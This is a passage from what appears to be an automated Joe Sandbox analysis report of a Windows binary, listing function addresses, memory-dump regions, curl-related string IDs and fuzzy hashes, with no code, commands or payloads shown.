                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $d$nil)
                                                          • API String ID: 0-394766432
                                                          • Opcode ID: 5234c15165e25c5e3538bbeda8bc5bfa617712bc0da6b9c581ee572a55a271ed
                                                          • Instruction ID: abfb4f01e763cc2172f39a9debafe990c58ce715e101548863f00e49f63d2c43
                                                          • Opcode Fuzzy Hash: 5234c15165e25c5e3538bbeda8bc5bfa617712bc0da6b9c581ee572a55a271ed
                                                          • Instruction Fuzzy Hash: 401346706083428FD724DF29C48562ABBE1BFC9314F244A6FE9959B3A1D771EC45CB82
                                                          Function 0030C900 Relevance: 5.4, Strings: 4, Instructions: 369COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                                          • API String ID: 0-3285806060
                                                          • Opcode ID: 4cdc8aeef9273964126fc61d39bc48af38a56c4485d70e395e5b0d9eb16d0ef4
                                                          • Instruction ID: 15f26e73163d0af1f14e5e05baea24b7f944fc839c210b0352c8a7fb7e5f15a6
                                                          • Opcode Fuzzy Hash: 4cdc8aeef9273964126fc61d39bc48af38a56c4485d70e395e5b0d9eb16d0ef4
                                                          • Instruction Fuzzy Hash: 3CD12672A193058BD726DF28C8A137ABBD1AF81304F155B3DE8C9876C2DB349D45D782
                                                          Function 005DCC70 Relevance: 5.4, Strings: 4, Instructions: 351COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$@$gfff$gfff
                                                          • API String ID: 0-2633265772
                                                          • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                          • Instruction ID: 805b68b249a432663dc08de8470587970cce8d1f27643ea7263e70219707ad27
                                                          • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                          • Instruction Fuzzy Hash: 0FD15B71A043468BDB24DE2DC88436ABFE2BFC4340F19892FE8599B355E770D949C792
                                                          Function 005E1780 Relevance: 4.0, Strings: 2, Instructions: 1506COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $
                                                          • API String ID: 0-227171996
                                                          • Opcode ID: 89a96ff487e89aebdf19bc11f161198ef7ed762c043aab9183713507e7f27628
                                                          • Instruction ID: cfdb1c10c50d43332542758730241728ecfa9487b33ca3ef95a1f8a1822e0f98
                                                          • Opcode Fuzzy Hash: 89a96ff487e89aebdf19bc11f161198ef7ed762c043aab9183713507e7f27628
                                                          • Instruction Fuzzy Hash: 5AE231B1A083818FD728DF2AC58471ABBE5BB88744F148D1EE8C997355E775E844CF82
                                                          Function 0027DCF0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$vtls/vtls.c
                                                          • API String ID: 0-424504254
                                                          • Opcode ID: f3cce9e6d879a1ac17e945650e551ea64f508d7adff4c0c63308d3255efa3444
                                                          • Instruction ID: 5b8d5e5f17a44e1cbf45ab25f9c2a2cdfe8c7fc986fb45c9024232444e85d87a
                                                          • Opcode Fuzzy Hash: f3cce9e6d879a1ac17e945650e551ea64f508d7adff4c0c63308d3255efa3444
                                                          • Instruction Fuzzy Hash: 22317872A2835257D3365D3C6C84A357AE19FA1304F1C827DE89D973D2F6B58C20C291
                                                          Function 005C8BF0 Relevance: 3.0, Strings: 2, Instructions: 512COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #$4
                                                          • API String ID: 0-353776824
                                                          • Opcode ID: abb367ad09252f815a089b70d10e7318adf1bcb1e81feaf3b1c31b37ab01d63b
                                                          • Instruction ID: 1fb836921cd799d8e65ba01a2ad7aae019a95346e927e2b66891d225b13f1184
                                                          • Opcode Fuzzy Hash: abb367ad09252f815a089b70d10e7318adf1bcb1e81feaf3b1c31b37ab01d63b
                                                          • Instruction Fuzzy Hash: 7422E2355087428FC314DF68C484BBAFBE4FF84318F158A2EE89997391D774A885CB96
                                                          Function 005C1BD0 Relevance: 3.0, Strings: 2, Instructions: 463COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #$4
                                                          • API String ID: 0-353776824
                                                          • Opcode ID: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                                          • Instruction ID: 21a10011513550820fb5cc7af19f75bf81ff8116d9970ab593e7a311c17a63ff
                                                          • Opcode Fuzzy Hash: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                                          • Instruction Fuzzy Hash: 2012D2326087018FC724CF58C484BAABBE5FFD4318F198A7DE89997352D7749884CB96
                                                          Function 005D4780 Relevance: 2.9, Strings: 2, Instructions: 446COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H$xn--
                                                          • API String ID: 0-4022323365
                                                          • Opcode ID: 719bafd1108970b957a2ea81dc7c69e9329f1abda222c7531928105b6d5a72ba
                                                          • Instruction ID: ca94ce3375e74e3ea57454e2dcd1da004a081ce2dace022bffb84a57cbb141ae
                                                          • Opcode Fuzzy Hash: 719bafd1108970b957a2ea81dc7c69e9329f1abda222c7531928105b6d5a72ba
                                                          • Instruction Fuzzy Hash: 61E114316087158FD728DE2CD8C062ABBE2BBD4314F188A3FE99687391E774DC458B42
                                                          Function 002610E6 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Downgrades to HTTP/1.1$multi.c
                                                          • API String ID: 0-3089350377
                                                          • Opcode ID: efb71f9e2083930e130131b6b5c34fdf4428d5e43f9a9c9fb816b519c1cf02c5
                                                          • Instruction ID: 4fb434bd6a445ec58259ae39d903146622d62245a1fa19bf6e825c4ca6d6c1ca
                                                          • Opcode Fuzzy Hash: efb71f9e2083930e130131b6b5c34fdf4428d5e43f9a9c9fb816b519c1cf02c5
                                                          • Instruction Fuzzy Hash: 2EC10675A24702ABD710DF24D88176AB7E0BF94304F18452DF84997292E7B1F9F8CB92
                                                          Function 00318F90 Relevance: 2.8, Strings: 2, Instructions: 256COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 127.0.0.1$::1
                                                          • API String ID: 0-3302937015
                                                          • Opcode ID: 7c51a115656c4ffcefd09c4d85277596c1967b27ad2cc6a728b2d24a75e298ef
                                                          • Instruction ID: 4ed3310f478d9d0861e07422188c7d8747f69f34fe0dc9bd541ec56c093ef2bd
                                                          • Opcode Fuzzy Hash: 7c51a115656c4ffcefd09c4d85277596c1967b27ad2cc6a728b2d24a75e298ef
                                                          • Instruction Fuzzy Hash: C0A109B1C14342ABE315DF10C855766B3E4BF99300F169A2AF8888B251F771EDD0C792
                                                          Function 002BA5B0 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M 0.$NT L
                                                          • API String ID: 0-1807112707
                                                          • Opcode ID: 54651db38706e138739ee3568a86d76adaa270a9762756c8892fe72f7f49c26e
                                                          • Instruction ID: b78fd165d271412b05f20f42613b2e6ab494212d81e3ce677038d87b4cc512c0
                                                          • Opcode Fuzzy Hash: 54651db38706e138739ee3568a86d76adaa270a9762756c8892fe72f7f49c26e
                                                          • Instruction Fuzzy Hash: 8F511774624301AFDB11DF20C8847AAB3F8FF58344F148569EC489F292D7B5DAA4DB92
                                                          Function 0056AE30 Relevance: 1.8, Strings: 1, Instructions: 598COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
